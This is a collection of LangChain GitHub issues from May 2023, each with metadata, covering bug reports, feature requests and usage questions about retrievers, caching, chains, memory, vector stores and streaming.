### Feature request Capability to retrieve relevance scores along with document has been added to VectorStoreRetriever as part of PR#4359. The search_type == "similarity_score_threshold" alternative is handled in the sync flow (VectorStoreRetriever.get_relevant_documents) but not in the async flow (VectorStoreRetriever.aget_relevant_documents). This request is to add handling of search_type "similarity_score_threshold" to the VectorStoreRetriever async flow. ### Motivation The feature is necessary to get relevancy/similarity scores as part of a chatbot using ConversationalRetrievalChain and vector stores in streaming (thus async) mode. Prevous PR implementing search_type == "similarity_score_threshold": https://github.com/hwchase17/langchain/pull/4359 ### Your contribution I can eventually work on this feature and submit a PR after setting up the whole environment (it would be my first PR on this project though)
search_type "similarity_score_threshold" is missing on async aget_relevant_documents
https://api.github.com/repos/langchain-ai/langchain/issues/4756/comments
2
2023-05-16T01:10:03Z
2023-06-06T12:39:39Z
https://github.com/langchain-ai/langchain/issues/4756
1,711,052,281
4,756
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. i just tried the [gptcache](https://python.langchain.com/en/latest/modules/models/llms/examples/llm_caching.html?highlight=cache#gptcache) using ChatOpenAI ```python from gptcache import Cache from gptcache.adapter.api import init_similar_cache from langchain.cache import GPTCache # Avoid multiple caches using the same file, causing different llm model caches to affect each other def init_gptcache(cache_obj: Cache, llm): init_similar_cache(cache_obj=cache_obj, data_dir=f"similar_cache_{llm}") langchain.llm_cache = GPTCache(init_gptcache) ``` ```python %%time llm([HumanMessage(content="Translate this sentence from English to Bahasa Indonesia. I love programming.")]) ``` ``` CPU times: user 30 ms, sys: 1.96 ms, total: 31.9 ms Wall time: 1.15 s AIMessage(content='Saya suka pemrograman.', additional_kwargs={}, example=False) ``` ```python %%time llm([HumanMessage(content="Translate this sentence from English to Bahasa Indonesia. I love programming.")]) ``` ``` CPU times: user 4.15 ms, sys: 1.91 ms, total: 6.05 ms Wall time: 1.34 s AIMessage(content='Saya suka pemrograman.', additional_kwargs={}, example=False) ``` the second execution runs longer, obviously that the cache is miss hit. can anyone confirm? ### Suggestion: _No response_
Question: Does Chat Model support caching?
https://api.github.com/repos/langchain-ai/langchain/issues/4755/comments
1
2023-05-16T01:09:04Z
2023-05-16T01:23:30Z
https://github.com/langchain-ai/langchain/issues/4755
1,711,051,594
4,755
[ "langchain-ai", "langchain" ]
### System Info 0.0.170, Linux-5.15.90.1-microsoft-standard-WSL2-x86_64-with-glibc2.31, Python 3.9 ```python Generative_Result_Message = """Given the following schema table, sql query and sql result. Provide a human readable answer to the question {sql_answering_document} Question: {question} Resulting Query: {sql_query} Return only the answer to the question and create your own human readable answer based off the sql result and sql query Below is the query result: """ SQL_RESULT_PROMPT = PromptTemplate( input_variables=["question", "sql_query", "sql_answering_document"], template=Generative_Result_Message, ) generative_result_llm = ChatOpenAI( model_name="gpt-4", temperature=self.temperature, openai_api_key=settings.OPENAI_API_KEY, client=get_client(), ) generative_result_llm_chain = LLMChain( llm=generative_result_llm, prompt=self.SQL_RESULT_PROMPT ) generative_result_reduce_chain = StuffDocumentsChain( llm_chain=generative_result_llm_chain, document_variable_name="sql_answering_document", ) combine_documents = MapReduceDocumentsChain( llm_chain=generative_result_llm_chain, combine_document_chain=generative_result_reduce_chain, document_variable_name="sql_answering_document", ) map_reduce = MapReduceChain( combine_documents_chain=combine_documents, text_splitter=CharacterTextSplitter(), ) result = map_reduce.run( { "question": document["generated_question"], "sql_query": sql_query, "sql_answering_document": "sql_answering_document", "input_text": query_result }) ``` This is the error log I'm getting > > answer = map_reduce( > File "/usr/local/lib/python3.9/site-packages/langchain/chains/base.py", line 142, in __call__ > raise e > File "/usr/local/lib/python3.9/site-packages/langchain/chains/base.py", line 136, in __call__ > self._call(inputs, run_manager=run_manager) > File "/usr/local/lib/python3.9/site-packages/langchain/chains/mapreduce.py", line 89, in _call > outputs = self.combine_documents_chain.run( > File "/usr/local/lib/python3.9/site-packages/langchain/chains/base.py", line 243, in run > return self(kwargs, callbacks=callbacks)[self.output_keys[0]] > File "/usr/local/lib/python3.9/site-packages/langchain/chains/base.py", line 142, in __call__ > raise e > File "/usr/local/lib/python3.9/site-packages/langchain/chains/base.py", line 136, in __call__ > self._call(inputs, run_manager=run_manager) > File "/usr/local/lib/python3.9/site-packages/langchain/chains/combine_documents/base.py", line 84, in _call > output, extra_return_dict = self.combine_docs( > File "/usr/local/lib/python3.9/site-packages/langchain/chains/combine_documents/map_reduce.py", line 144, in combine_docs > results = self.llm_chain.apply( > File "/usr/local/lib/python3.9/site-packages/langchain/chains/llm.py", line 160, in apply > raise e > File "/usr/local/lib/python3.9/site-packages/langchain/chains/llm.py", line 157, in apply > response = self.generate(input_list, run_manager=run_manager) > File "/usr/local/lib/python3.9/site-packages/langchain/chains/llm.py", line 80, in generate > prompts, stop = self.prep_prompts(input_list, run_manager=run_manager) > File "/usr/local/lib/python3.9/site-packages/langchain/chains/llm.py", line 108, in prep_prompts > selected_inputs = {k: inputs[k] for k in self.prompt.input_variables} > File "/usr/local/lib/python3.9/site-packages/langchain/chains/llm.py", line 108, in <dictcomp> > selected_inputs = {k: inputs[k] for k in self.prompt.input_variables} > KeyError: 'question' > When I inspected the affected library files and log the data before the method that's triggering the error this is the output > [2023-05-15 23:39:46,775: INFO/ForkPoolWorker-7] kwargs in chains/base.py (part two) kwargs: {'input_documents': [Document(page_content="[('2-3 times a week', 4), ('Twice a month', 2), ('Once a week', 2), ('On occasions', 1)]", metadata={})]} args: () > [2023-05-15 23:39:46,775: INFO/ForkPoolWorker-7] inputs from library file: {'input_documents': [Document(page_content="[('2-3 times a week', 4), ('Twice a month', 2), ('Once a week', 2), ('On occasions', 1)]", metadata={})]} > [2023-05-15 23:39:46,776: INFO/ForkPoolWorker-7] input listings from prep_prompts [{'sql_answering_document': "[('2-3 times a week', 4), ('Twice a month', 2), ('Once a week', 2), ('On occasions', 1)]"}] Which is weird, I'm not sure why the prompt inputs would not include the one from the llm I setup ### Who can help? @hwchase17 ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [X] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction N/A ### Expected behavior N/A
LLM Not Receiving prompt ARGS
https://api.github.com/repos/langchain-ai/langchain/issues/4752/comments
0
2023-05-15T23:51:55Z
2023-06-03T21:41:05Z
https://github.com/langchain-ai/langchain/issues/4752
1,710,996,090
4,752
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. How do I stop the stream when using callbacks like async callback? When I stop the stream, does the openAI still charges the remainders of the generation? ### Suggestion: _No response_
How to stop the stream? and does it stop the openai charging?
https://api.github.com/repos/langchain-ai/langchain/issues/4743/comments
7
2023-05-15T20:07:08Z
2024-06-09T09:32:30Z
https://github.com/langchain-ai/langchain/issues/4743
1,710,750,362
4,743
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. [similarity_search](https://github.com/hwchase17/langchain/blob/09587a32014bb3fd9233d7a567c8935c17fe901e/langchain/vectorstores/weaviate.py#L174-L175) in weaviate uses near_text. This requires weaviate to be set up with a [text2vec module](https://weaviate.io/developers/weaviate/modules/retriever-vectorizer-modules). At the same time, the weaviate also takes an [embedding model](https://github.com/hwchase17/langchain/blob/09587a32014bb3fd9233d7a567c8935c17fe901e/langchain/vectorstores/weaviate.py#L86) as one of it's init parameters. Why don't we use the embedding model to vectorize the search query and then use weaviate's near_vector operator to do the search? ### Suggestion: If a user is using langchain with weaviate, we can assume that they want to use langchain's features to generate the embeddings and as such, will not have any text2vec module enabled.
Issue: Weaviate: why similarity_search uses with_near_text?
https://api.github.com/repos/langchain-ai/langchain/issues/4742/comments
5
2023-05-15T18:37:07Z
2023-05-17T02:43:16Z
https://github.com/langchain-ai/langchain/issues/4742
1,710,614,532
4,742
[ "langchain-ai", "langchain" ]
### System Info langchain 0.0.166 Python 3.10.9 Operating System: Kubuntu 23.04 KDE Plasma Version: 5.27.4 KDE Frameworks Version: 5.104.0 Qt Version: 5.15.8 Kernel Version: 6.2.0-20-generic (64-bit) Graphics Platform: X11 Processors: 12 × AMD Ryzen 5 5600X 6-Core Processor Memory: 31.2 GiB of RAM Graphics Processor: NVIDIA GeForce GTX 1080/PCIe/SSE2 ### Who can help? @hwchase17 @agola11 ### Information - [X] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction ### Steps to reproduce `git clone https://github.com/imartinez/privateGPT` (follow project instructions) ``` pip install -r requirements.txt wget https://gpt4all.io/models/ggml-gpt4all-j-v1.3-groovy.bin wget https://huggingface.co/Pi3141/alpaca-native-7B-ggml/resolve/397e872bf4c83f4c642317a5bf65ce84a105786e/ggml-model-q4_0.bin mkdir ./models mv *.bin ./models/ cp example.env .env python ingest.py python privateGPT.py ``` ### Expected behavior while `ingest.py` or `privateGPT.py` is running the machine should crash (turn off) debugger shows crash occurs at, `ingest.py`: `llama = LlamaCppEmbeddings(model_path=llama_embeddings_model, n_ctx=model_n_ctx)`
LlamaCppEmbeddings crashing (reboot) Linux Kubuntu 23.04 machine
https://api.github.com/repos/langchain-ai/langchain/issues/4738/comments
1
2023-05-15T17:15:38Z
2023-09-10T16:17:24Z
https://github.com/langchain-ai/langchain/issues/4738
1,710,499,528
4,738
[ "langchain-ai", "langchain" ]
### System Info Main branch. ### Who can help? @hwchase17 ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [X] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Docstring for `ConversationalChatAgent` and `ConversationalAgent` is identical. The user does not know the difference between the two classes. https://github.com/hwchase17/langchain/blob/c70ae562b466ba9a6d0f587ab935fd9abee2bc87/langchain/agents/conversational_chat/base.py#L36-L37 https://github.com/hwchase17/langchain/blob/c70ae562b466ba9a6d0f587ab935fd9abee2bc87/langchain/agents/conversational/base.py#L20-L21 ### Expected behavior The difference should be explained in the doctring.
Identical Docstring for `ConversationalChatAgent` and `ConversationalAgent`.
https://api.github.com/repos/langchain-ai/langchain/issues/4736/comments
4
2023-05-15T16:30:08Z
2023-12-20T16:07:51Z
https://github.com/langchain-ai/langchain/issues/4736
1,710,433,310
4,736
[ "langchain-ai", "langchain" ]
### Feature request In the [Chameleon paper](https://arxiv.org/abs/2304.09842), there are some prompt tricks different from langchain, such as: 1. There is a planner responsible for generating "steps to use the tool" For example, a generated "steps" looks like: ![image](https://github.com/hwchase17/langchain/assets/26001097/3a770cf8-12bc-4be5-a035-ac6c259cdde7) Langchain also has the ["Plan and Execute" feature](https://python.langchain.com/en/latest/modules/agents/plan_and_execute.html) , but each step in the generated plan is a text goal, not a tool. For example: <img width="775" alt="image" src="https://github.com/hwchase17/langchain/assets/26001097/2ba714d4-3937-429c-8fde-e9be50836eb1"> I'm not sure which of the two is better 2. Heuristically verify the plan generated by the planner In the paper, the author used some rules to verify whether the generated steps are valid, such as verifying that "step x must be before step y, otherwise it will be considered invalid". At present, langchain don't have such a mechanism. Maybe we can add this feature? ### Motivation To make the plan more accurate ### Your contribution I'm a python noob, maybe I can help coding
How about using the prompts in the Chameleon paper?
https://api.github.com/repos/langchain-ai/langchain/issues/4730/comments
2
2023-05-15T15:17:46Z
2023-09-10T16:17:29Z
https://github.com/langchain-ai/langchain/issues/4730
1,710,317,818
4,730
[ "langchain-ai", "langchain" ]
### System Info langchain: 0.0.169 Python: 3.10.10 MacOS: 12.6.5 (21G531) ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction When running the notebook featured here: [https://python.langchain.com/en/latest/modules/chains/index_examples/summarize.html](https://python.langchain.com/en/latest/modules/chains/index_examples/summarize.html), the following cell will fail. ```python chain = load_summarize_chain(llm, chain_type="map_reduce") chain.run(docs) ``` Unless you have pre-installed `tiktoken`, you will receive an error: ```text --------------------------------------------------------------------------- ModuleNotFoundError Traceback (most recent call last) File [/usr/local/lib/python3.10/site-packages/langchain/llms/openai.py:464](https://file+.vscode-resource.vscode-cdn.net/usr/local/lib/python3.10/site-packages/langchain/llms/openai.py:464), in BaseOpenAI.get_num_tokens(self, text) 463 try: --> 464 import tiktoken 465 except ImportError: ModuleNotFoundError: No module named 'tiktoken' ``` Installing `tiktoken` solves the immediate issue. ```python %pip install tiktoken ``` ### Expected behavior The notebook runs without errors.
Summarization Notebook: No module named 'tiktoken'
https://api.github.com/repos/langchain-ai/langchain/issues/4728/comments
2
2023-05-15T15:02:38Z
2023-09-12T16:15:11Z
https://github.com/langchain-ai/langchain/issues/4728
1,710,288,233
4,728
[ "langchain-ai", "langchain" ]
### Feature request Enum's don't work well with the structured agent. The data validation works fine, but it would be great if we took the ideas from the `StructuredChatOutputParserWithRetries` and applied it to the StructuredTool's. For example, when a validation error raises due to an enum breach, parse the error message into an LLM with the schema and input and get it to fix the tool input prior to continuing. This would make the StructuredTools more robust IMO. This may be a step to far, but it would also be nice to be able to handle these validation errors in different ways: 1. Correct the error similar to the `StructuredChatOutputParserWithRetries`; 2. Use a different tool that might collect some additional information from the user or tool. ### Motivation I would like to constrain the input parameters of my StructuredTools to an enum so I can avoid bugs. ### Your contribution I am happy to raise a PR for the parser code but I would need to seek guidance from a maintainer if and how this would work with the existing flow of the software.
Enums Don't Work Well With Structured Agent
https://api.github.com/repos/langchain-ai/langchain/issues/4724/comments
3
2023-05-15T13:13:07Z
2023-10-15T16:07:13Z
https://github.com/langchain-ai/langchain/issues/4724
1,710,079,527
4,724
[ "langchain-ai", "langchain" ]
### System Info ``` langchain version==0.0.169 python=3.10.10 platform=dev_containers ``` The code given below is not able to utilise memory for answering questions with references ### Who can help? @hwchase17 @agola11 ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [X] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Use the following code with the necessary changes on your end to replicate: ``` from dotenv import load_dotenv, find_dotenv from qdrant_client import QdrantClient from langchain.chains import ConversationalRetrievalChain from langchain.chat_models import ChatOpenAI from langchain.vectorstores import Qdrant from langchain.embeddings import OpenAIEmbeddings from langchain.memory import ConversationBufferMemory, RedisChatMessageHistory import os from loguru import logger import redis # Load environment variables from .env file load_dotenv(find_dotenv("../app/.env")) url = os.environ.get("QDRANT_URL") collection_name = os.environ.get("QDRANT_COLLECTION_NAME") openai_api_key = os.environ.get("OPENAI_API_KEY") redis_host = os.environ.get("REDIS_HOST") redis_port = os.environ.get("REDIS_PORT") # Initialize Qdrant client and vector database if url is not None and collection_name is not None: client = QdrantClient(url=url, prefer_grpc=True) embeddings = OpenAIEmbeddings(openai_api_key=openai_api_key) vectordb = Qdrant(client, collection_name, embeddings.embed_query) else: logger.error("Qdrant URL or Collection Name not set in environment variables") # Initialize the LLM if openai_api_key is not None: llm = ChatOpenAI(openai_api_key=openai_api_key, temperature=0, model_name="gpt-3.5-turbo") else: logger.error("OpenAI API key not set in environment variables") from langchain.memory import ConversationBufferMemory memory = ConversationBufferMemory( memory_key="chat_history", return_messages=True, output_key="answer" ) def get_chat_history(inputs) -> str: res = [] for message in inputs: if isinstance(message, dict) and "content" in message: res.append(message["content"]) return "\n".join(res) from langchain.prompts import PromptTemplate template = """Answer the question in your own words as truthfully as possible from the context given to you. If you do not know the answer to the question, simply respond with "I don't know. Can you ask another question". If questions are asked where there is no relevant context available, simply respond with "I don't know. Please ask a question relevant to the documents" Context: {context} {chat_history} Human: {question} Assistant:""" prompt = PromptTemplate( input_variables=["context", "chat_history", "question"], template=template ) # Create the custom chain if llm is not None and vectordb is not None: chain = ConversationalRetrievalChain.from_llm( llm=llm, retriever=vectordb.as_retriever(), memory=memory, get_chat_history=get_chat_history, return_source_documents=True, combine_docs_chain_kwargs={'prompt': prompt}) else: logger.error("LLM or Vector Database not initialized") # Initialize Redis connection if redis_host is not None and redis_port is not None: redis_client = redis.Redis(host=redis_host, port=redis_port) else: logger.error("Redis host or port not set in environment variables") session_id = "sample_id" # Retrieve chat history for session from Redis chat_history = redis_client.get(session_id) if chat_history is None: # If chat history does not exist, create a new one chat_history = RedisChatMessageHistory(session_id, url=f"redis://{redis_host}:{redis_port}") else: # If chat history exists, deserialize it from Redis chat_history = RedisChatMessageHistory.deserialize(chat_history, url=f"redis://{redis_host}:{redis_port}") # Retrieve answer from chain chain({"question": "Who is Harry potter?", "chat_history": chat_history.messages}) chain({"question": "What are his qualities?", "chat_history": chat_history.messages}) ``` ### Expected behavior `What are his qualities?` should return Harry Potter's qualities and not `I don't know. Please ask a question relevant to the documents.`
ConversationalRetrievalChain doesn't work with memory
https://api.github.com/repos/langchain-ai/langchain/issues/4722/comments
10
2023-05-15T11:46:00Z
2023-09-28T16:06:54Z
https://github.com/langchain-ai/langchain/issues/4722
1,709,924,459
4,722
[ "langchain-ai", "langchain" ]
### Feature request Add summarization task type for HuggingFace APIs. This task type is described by [HuggingFace inference API](https://huggingface.co/docs/api-inference/detailed_parameters#summarization-task) ### Motivation My project utilizes LangChain to connect multiple LLMs, including various HuggingFace models that support the summarization task. Integrating this task type is highly convenient and beneficial. ### Your contribution I will submit a PR.
Add summarization task type for HuggingFace APIs
https://api.github.com/repos/langchain-ai/langchain/issues/4720/comments
0
2023-05-15T11:23:49Z
2023-05-15T23:26:20Z
https://github.com/langchain-ai/langchain/issues/4720
1,709,886,048
4,720
[ "langchain-ai", "langchain" ]
### Feature request The qdrant vector store has "must" in filter, is it possible to add "must_not" and/or "should" as well? Ref: https://qdrant.tech/documentation/filtering/ ### Motivation Having a filter is really nice, but its hard to use row level authorization without "must_not" So we can say "must" include ID and "must_not" include ID2 To be able to filter correctly ### Your contribution I am a front-end developer, and hoping someone with python competance can handle this.
Qdrant filtering methods
https://api.github.com/repos/langchain-ai/langchain/issues/4718/comments
5
2023-05-15T10:49:29Z
2023-09-15T22:12:57Z
https://github.com/langchain-ai/langchain/issues/4718
1,709,831,906
4,718
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. I created an AgentExecutor with the ConversationalChatAgent and I could pass a system message as I initialize the agent executor. Is it possible to add system messages to individual prompts, not just one in the beginning? My code: ``` from langchain import PromptTemplate from langchain.agents import ConversationalChatAgent, Tool, AgentExecutor import pickle import os import datetime import logging # from controllers.user_controller import UserController from langchain.llms import OpenAI from langchain.document_loaders import DirectoryLoader from langchain.text_splitter import CharacterTextSplitter # from langchain.vectorstores import FAISS from langchain.embeddings.openai import OpenAIEmbeddings from langchain.chains import RetrievalQA class ChatController(object): def __init__(self): self._create_chat_agent() def _create_chat_agent(self): self.llm = OpenAI(temperature=0, top_p=0.2, presence_penalty=0.4, frequency_penalty=0.2) embeddings = OpenAIEmbeddings() persist_directory = 'myvectordb' vectorstore = Chroma(persist_directory=persist_directory, embedding_function = embeddings) prompt_template = """If the context is not relevant, please answer the question by using your own knowledge about the topic {context} Question: {question} """ PROMPT = PromptTemplate( template=prompt_template, input_variables=["context", "question"] ) chain_type_kwargs = {"prompt": PROMPT} # Initialise Langchain - QA chain qa = RetrievalQA.from_chain_type(llm=self.llm, chain_type="stuff", retriever=vectorstore.as_retriever(), chain_type_kwargs=chain_type_kwargs) tools = [ Tool( name="Document tool", func=qa.run, description="useful for when you need to answer questions." ), ] system_msg = "You are a helpful assistant." agent = ConversationalChatAgent.from_llm_and_tools( llm=self.llm, tools=tools, system_message=system_msg ) self.chat_agent = AgentExecutor.from_agent_and_tools( agent=agent, tools=tools, verbose=True, memory=ConversationBufferMemory(memory_key="chat_history", return_messages=True) ) def askAI(self, prompt: str): response = self.chat_agent.run(input=prompt) return {"answer": response} ``` ### Suggestion: _No response_
Issue: Is it possible to add system message with the prompt?
https://api.github.com/repos/langchain-ai/langchain/issues/4716/comments
2
2023-05-15T09:51:06Z
2023-09-10T16:17:39Z
https://github.com/langchain-ai/langchain/issues/4716
1,709,729,606
4,716
[ "langchain-ai", "langchain" ]
### Feature request Right now, streaming in LLM's are can be seen in stdout in terminals but not as output responses. I'm using conversation chain where i see my output in the terminal as streaming but not while return the output through API. ### Motivation Responses may get started typing and the user may have some patience for his/her query. because if the prompt, context is lengthier there is a delay in response too. Above implementation can helps ### Your contribution -
Streaming Responses As Ouput Using FastAPI Support
https://api.github.com/repos/langchain-ai/langchain/issues/4715/comments
16
2023-05-15T06:56:02Z
2023-09-30T16:07:19Z
https://github.com/langchain-ai/langchain/issues/4715
1,709,434,878
4,715
[ "langchain-ai", "langchain" ]
### System Info langchain version:0.0.168 python version 3.10 ### Who can help? @agola11 ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [X] Callbacks/Tracing - [ ] Async ### Reproduction When using the RetrievalQA chain, an error message "Error in on_llm callback: 'AsyncIteratorCallbackHandler' object has no attribute 'on_llm'" This code can run at version 0.0.164 ```python class Chain: def __init__(self): self.cb_mngr_stdout = AsyncCallbackManager([StreamingStdOutCallbackHandler()]) self.cb_mngr_aiter = AsyncCallbackManager([AsyncIteratorCallbackHandler()]) self.qa_stream = None self.qa = None self.make_chain() def make_chain(self): chain_type_kwargs = {"prompt": MyPrompt.get_retrieval_prompt()} qa = RetrievalQA.from_chain_type(llm=ChatOpenAI(model_name="gpt-3.5-turbo", max_tokens=1500, temperature=.1), chain_type="stuff", retriever=Retrieval.vectordb.as_retriever(search_kwargs={"k": Retrieval.context_num}), chain_type_kwargs=chain_type_kwargs, return_source_documents=True) qa_stream = RetrievalQA.from_chain_type(llm=ChatOpenAI(model_name="gpt-3.5-turbo", max_tokens=1500, temperature=.1, streaming=True, callback_manager=self.cb_mngr_aiter), chain_type="stuff", retriever=Retrieval.vectordb.as_retriever(search_kwargs={"k": Retrieval.context_num}), chain_type_kwargs=chain_type_kwargs, return_source_documents=True) self.qa = qa self.qa_stream = qa_stream ``` call function ```python resp = await chains.qa.acall({"query": "xxxxxxx"}) # no problem resp = await chains.qa_stream.acall({"query": "xxxxxxxx"}) # error ``` ### Expected behavior self.qa_stream return result like self.qa,or like langchain version 0.0.164
Error in on_llm callback: 'AsyncIteratorCallbackHandler' object has no attribute 'on_llm'
https://api.github.com/repos/langchain-ai/langchain/issues/4714/comments
2
2023-05-15T06:30:00Z
2023-05-16T01:36:23Z
https://github.com/langchain-ai/langchain/issues/4714
1,709,405,469
4,714
[ "langchain-ai", "langchain" ]
### Feature request https://platform.openai.com/docs/api-reference/embeddings/create?lang=python supports a user parameter, where we can pass user details to the openai api. https://github.com/hwchase17/langchain/blob/master/langchain/embeddings/openai.py#L66 can take a user parameter (optional) , which needs to be passed via embed_with_retry function. ### Motivation We use it to track user details - could be appkey etc. ### Your contribution Yes, can create a PR. Please let me know process .
Support for user parameter in OpenAI Embeddings Create class, which exists in OpenAI API
https://api.github.com/repos/langchain-ai/langchain/issues/4711/comments
4
2023-05-15T05:26:16Z
2023-12-09T16:06:51Z
https://github.com/langchain-ai/langchain/issues/4711
1,709,341,947
4,711
[ "langchain-ai", "langchain" ]
I was using RetrievalQA.from_chain_type, to which I had passed parameters as:- `RetrievalQA.from_chain_type(llm, chain_type, retriever = chroma_db.as_retriever(), return_source_documents = True)` Here, return_source_documents = True, only returns the chunks from which it generated the response. _Is there a way in which I can get similarity score also returned for matched chunks_ (say if there are 4 chunks it found most relevant to query, how to get scores in decreasing order based on similarity)
How to use return_source_documents to also extract similarity score??
https://api.github.com/repos/langchain-ai/langchain/issues/4710/comments
13
2023-05-15T04:44:31Z
2024-05-14T16:15:02Z
https://github.com/langchain-ai/langchain/issues/4710
1,709,303,133
4,710
[ "langchain-ai", "langchain" ]
### Issue with current documentation: https://python.langchain.com/en/latest/modules/chains/examples/sqlite.html#customize-prompt When looking at the Cutomize prompt example, the subsequent `db_chain.run()` command is just like the pre-prompt chain. It is currently like: `db_chain.run("How many employees are there in the foobar table?")` Shouldn't it be something like: `db_chain.run({'input': "How many employees are there in the foobar table?", 'table':'foobar', 'dialect':'testing'})` Since we added the prompt to the db_chain ### Idea or request for content: _No response_
DOC: SQL Chain Example - Customise Prompt
https://api.github.com/repos/langchain-ai/langchain/issues/4703/comments
17
2023-05-15T02:10:11Z
2023-10-19T16:08:23Z
https://github.com/langchain-ai/langchain/issues/4703
1,709,196,707
4,703
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. The embedding models of cohere are 1. embed-english-light-v2.0 2. embed-english-v2.0 3. embed-multilingual-v2.0 The corresponding embedding wrapper in langchain will need to reflect that. Currently it is defaulted to large ### Suggestion: _No response_
Issue: The cohere embedding model has the model defaulted to large. These names are deprecated
https://api.github.com/repos/langchain-ai/langchain/issues/4694/comments
0
2023-05-15T00:09:11Z
2023-05-16T23:27:25Z
https://github.com/langchain-ai/langchain/issues/4694
1,709,123,191
4,694
[ "langchain-ai", "langchain" ]
### Feature request It would be nice to have the ability to get the positions of the extracted texts - i.e. the beginning and end (character position) of the split text from the text body, or the line and line character position of the extracted text. ### Motivation I'm working on a way ingest a code repo into a vector store and link it to a graph database. The line and character position would be incredibly useful in the metadata to interface the two. This could provide a richer context for tracking data positions and could offer mechanisms for testing. ### Your contribution I'd be happy to submit a PR regarding this if it makes sense to others.
Ability to get the character or the line and line character positions from a split text
https://api.github.com/repos/langchain-ai/langchain/issues/4692/comments
1
2023-05-14T23:10:03Z
2023-09-10T16:17:45Z
https://github.com/langchain-ai/langchain/issues/4692
1,709,106,195
4,692
[ "langchain-ai", "langchain" ]
### System Info langchain version: 0.0.168 OS: Mac ### Who can help? @eyurtsev ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [X] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Hi, I am trying to play with SQLDatabaseChain and I tried to connect it with the PostgreSQL database. I tested with the URL, and it works well with the SQLAlchemy engine and I was able to execute queries successfully. Here are my codes to use SQLDatabasechain: ```Python db = SQLDatabase.from_uri(url, sample_rows_in_table_info = 10, ) ``` However, it keeps showing that there are no tables. I used `db.get_table_info()`, it always return an empty set. Do you have any ideas ? Appreciate! ### Expected behavior I expected it can inspect the schema correctly.
SQLDatabaseChain did not read PostgreSQL database table information correctly
https://api.github.com/repos/langchain-ai/langchain/issues/4690/comments
6
2023-05-14T22:58:23Z
2024-01-30T00:42:49Z
https://github.com/langchain-ai/langchain/issues/4690
1,709,102,621
4,690
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. I encountered a `TypeError: string indices must be integers` error when using the library to retrieve chat messages from a PostgreSQL database. This error occurs specifically in the `messages_from_dict` function. Upon further investigation, it appears that the error arises when trying to access the "type" field of a message dictionary. The `messages_from_dict` function is expected to convert a list of dictionaries into a list of `BaseMessage` objects, but it fails to handle the dictionary properly. To reproduce the issue, follow these steps: 1. Set up the library to use a PostgreSQL database as the chat message history storage. 2. Start a conversation and exchange messages. 3. Retrieve the chat history using the `messages` property of the `PostgresChatMessageHistory` class. The error occurs when the `messages` property executes the following code snippet: ```python items = [record["message"] for record in self.cursor.fetchall()] messages = messages_from_dict(items) The messages_from_dict function attempts to convert each dictionary in the items list to a BaseMessage object. However, it fails to properly handle the dictionary structure, resulting in the TypeError. Environment: Library version: [Specify library version] Python version: [Specify Python version] PostgreSQL version: [Specify PostgreSQL version] Operating system: [Specify operating system] ### Suggestion: To resolve this issue, the implementation of the messages_from_dict function needs to be reviewed and updated accordingly. It should correctly handle the structure of each message dictionary and create BaseMessage objects with the expected attributes. Additionally, it would be helpful to provide clearer documentation or examples on how to set up the PostgreSQL chat message history and ensure the expected structure of the messages stored in the message_store table.
Issue: TypeError: string indices must be integers when retrieving messages from PostgreSQL
https://api.github.com/repos/langchain-ai/langchain/issues/4684/comments
6
2023-05-14T19:53:52Z
2023-12-03T16:07:36Z
https://github.com/langchain-ai/langchain/issues/4684
1,709,054,913
4,684
[ "langchain-ai", "langchain" ]
